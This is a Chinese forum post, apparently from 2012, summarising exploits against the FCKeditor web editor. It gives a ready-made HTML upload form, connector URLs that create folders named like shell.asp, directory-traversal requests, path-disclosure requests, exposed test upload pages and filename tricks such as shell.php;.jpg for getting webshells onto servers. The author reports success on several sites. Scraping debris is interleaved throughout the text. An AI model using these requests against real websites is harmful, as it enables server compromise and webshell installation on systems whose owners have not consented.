Fckeditor漏洞利用总结
' U+ `& R, x3 i2 I y查看编辑器版本
v7 K3 ^; N1 n6 R/ Z7 jFCKeditor/_whatsnew.html+ A! L+ V, V! M) A' L* C
—————————————————————————————————————————————————————————————
; G1 D Y- @1 h4 a/ F \% ?
9 y5 b2 _- k" ?9 T0 h r0 N8 b9 q2. Version 2.2 版本8 e& G, i- U3 i2 c
Apache+linux 环境下在上传文件后面加个.突破!测试通过。
. N( f: W* l5 z; G( s6 d—————————————————————————————————————————————————————————————& k# } Z+ K. k4 W8 q X3 ~
9 P, H, U8 [% W1 u, w
3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
# u! o* A1 h0 O; Y) M. s0 \ p<form id="frmUpload" enctype="multipart/form-data"* K1 R+ n& N( _8 n
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
# p# p) Q8 a/ D# G9 u/ Q& C i% r+ n<input type="file" name="NewFile" size="50"><br>
5 M: q4 m# H! n ?+ B5 }5 u- l<input id="btnUpload" type="submit" value="Upload">1 O8 c6 [8 n6 r$ t" d
</form>2 f" {, k% \; R6 ]+ [; I7 x
—————————————————————————————————————————————————————————————9 p* H5 x9 d) P; ?+ i0 W
0 k+ k3 k, W% c1 A1 E$ I5 Q
4.FCKeditor 文件上传“.”变“_”下划线的绕过方法1 `6 y/ n3 ~, \9 A5 o! W7 U0 O4 ?: a
很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
& i* v" y. p; `8 E9 A- G1 l 4.1:提交shell.php+空格绕过
1 v/ Y9 c- c6 L5 G* [& U不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
3 |8 ?" U* U5 _2 x7 g 4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
" ?& x) p% O8 u" L8 Y—————————————————————————————————————————————————————————————
2 e9 {4 o/ i6 c7 H/ R* _
/ {8 v! M* u. N8 u, Q- K- f5. 突破建立文件夹; R, N0 o S2 @7 [4 L! X+ s
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684& R/ a) J" A9 y/ j; g. V9 _" i; K
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
" X+ w u! W/ s% H% B; d—————————————————————————————————————————————————————————————
* c0 f+ y$ r" m! e, X! Q0 u5 e" E
# a7 P7 N+ Z) I3 n* h6 e+ i6. FCKeditor 中test 文件的上传地址
1 _6 d- w3 S' Z" j7 d; sFCKeditor/editor/filemanager/browser/default/connectors/test.html
& p* G. j$ {. @5 F& o$ HFCKeditor/editor/filemanager/upload/test.html. i2 m& m( Y- u* M" y
FCKeditor/editor/filemanager/connectors/test.html9 x% p. F/ X7 H5 n
FCKeditor/editor/filemanager/connectors/uploadtest.html! |; _7 y/ ?0 \# M, ]
—————————————————————————————————————————————————————————————
5 ^% K8 n O, E2 o$ N& C& y1 S! }* ~2 f. P% J
7.常用上传地址" _3 L; q' u" K, P% L
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
. @% k* `% @& ^! N9 X) T6 cFCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
: k4 a- }. `% ^2 bFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
9 @& o# |) r% |5 g- h" nJSP 版:$ |* G. c/ Y# p( c7 a' E& w, E: u
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp' C! j2 {! f, s! V
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
7 J! |1 x' Q, a. ^. {7 a1 K E件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。8 I( A+ T& l1 w, |( w. y
————————————————————————————————————————————————————————————— ]8 ?6 t7 d' E) \. f
4 [/ J6 B9 _0 e$ Z8.其他上传地址, U& N. S5 k8 j6 h
FCKeditor/_samples/default.html
. r1 N7 ^ k" MFCKeditor/_samples/asp/sample01.asp
! e# `3 p8 |9 E) U1 z. J8 {) |. zFCKeditor/_samples/asp/sample02.asp
9 N; B) g5 M/ s! G2 g/ {FCKeditor/_samples/asp/sample03.asp
8 Z' O5 g- A/ R( V' z pFCKeditor/_samples/asp/sample04.asp( W; z* ?9 O( n& Y
一般很多站点都已删除_samples 目录,可以试试。
" s6 ^" V' [ U) y& q5 x* ~FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。, N2 h, i# t* b+ h* Y
—————————————————————————————————————————————————————————————
0 Q3 `: t$ f2 G' g1 Z ?: R) [: x3 @1 R6 X' R$ t; Z0 w6 w3 |) ?) c: r
9.列目录漏洞也可助找上传地址0 E5 B. B# J* n; N: u* q" d+ y
Version 2.4.1 测试通过
9 ^9 a m, g$ U8 t0 W1 X" q修改CurrentFolder 参数使用 ../../来进入不同的目录9 u6 p. C8 W1 G! F
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
" d7 v' o; h W2 q3 t% t. |根据返回的XML 信息可以查看网站所有的目录。+ u$ t N8 @9 I
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
5 s. \& U5 i2 ~( c% c* K也可以直接浏览盘符:" B9 X- M" P' C9 o, V
JSP 版本:. ^0 \8 s% U) F9 f
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
1 d/ z! g$ \4 h: e' L& P2 |% t F& i, i: U—————————————————————————————————————————————————————————————
- F7 M' P% q; n. H; \, \3 h: d7 ]5 r8 e% K6 V3 c3 _
10.爆路径漏洞
7 Q3 @ f8 Q& `$ L2 |9 d& VFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp' C/ r$ |4 a( n, v
—————————————————————————————————————————————————————————————$ g" U7 |) w$ t! T7 ?
/ k1 ^. p0 s; O
11. FCKeditor 被动限制策略所导致的过滤不严问题6 {3 r4 `; b, x8 [
影响版本: FCKeditor x.x <= FCKeditor v2.4.3
; |9 ?9 W* f+ G. H% p9 j脆弱描述:
; u" {" |8 K! m' _FCKeditor v2.4.3 中File 类别默认拒绝上传类型:7 @4 s+ ~- `% o, W2 v5 Q/ {, m
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm! `6 q* i1 w* ?) Q0 t
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!3 b# h! `' @$ Y+ b" t* T
而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。0 u4 w9 C+ q& b% K$ |
在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!0 b8 @ w- r! i8 w
—————————————————————————————————————————————————————————————. T: Z; ]0 Z4 N
6 T: ^+ b* I3 G/ R12.最古老的漏洞,Type文件没有限制!& x" M9 ~5 w2 k( E
我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本!
; D3 _; y& z3 ]5 t—————————————————————————————————————————————————————————————4 b+ j! C0 x' n4 a( D$ B& {
! ^( ]/ F( t3 H0 e! b- F& ~===============================================================================================================================================
& }& j! R% D7 z2 ~/ ^8 a' ]! G' t }3 W& u3 P7 w& h2 q9 X
FCK编辑器jsp版本漏洞:% D& ]1 D: E0 o; x% ?! K+ ]
. X: |- e% v: m0 g, A
- s9 J+ }+ }$ e# z7 ahttp://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F: P/ t4 u4 m9 }) q; }1 v
2 R. s- c# O) S上传马所在目录# _: n3 q! y* y7 v
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ l4 q: a/ x# A+ U9 M- g3 Q9 p5 k( n
上传shell的地址:5 a' W" H0 Y. S1 P4 i5 K) C: g
http://www.xxx.com/fckeditor/edi ... ctors/jsp/connector
% V# q+ v: ~2 a6 P, c跟版本有关系.并不是百分百成功. 测试成功几个站.
, k% p9 ^" s; P不能通杀.很遗憾.
1 y3 d P- q/ Qhttp://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector
+ M& t& r0 ^' W3 m* Z如果以上地址不行可以试试. j s O* ~; J" w! X: m
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector# z% ^; E& Q6 ^! {; q. X3 N
FCKeditor/_samples/, Z/ T( X X0 m2 s% X' M
FCKeditor/_samples/default.html7 S1 Y" w( v$ o2 I- T6 Y9 F, k4 v
FCKeditor/editor/fckeditor.htm
* z9 h" \" [% r- sFCKeditor/editor/fckdialog.html9 t5 p/ j% Y9 n6 v
q8 Y$ S5 }! _
) \9 q( D5 \( e# {! a0 J7 D
. L3 Y- D# |+ O! Z' w# Q( N* S- h解析漏洞+未重命名文件时上传漏洞 1.asp;jpg
# H) X$ S- a7 T- l8 i7 G. K |
发表于 2012-9-13 17:01:39
收藏
支持
反对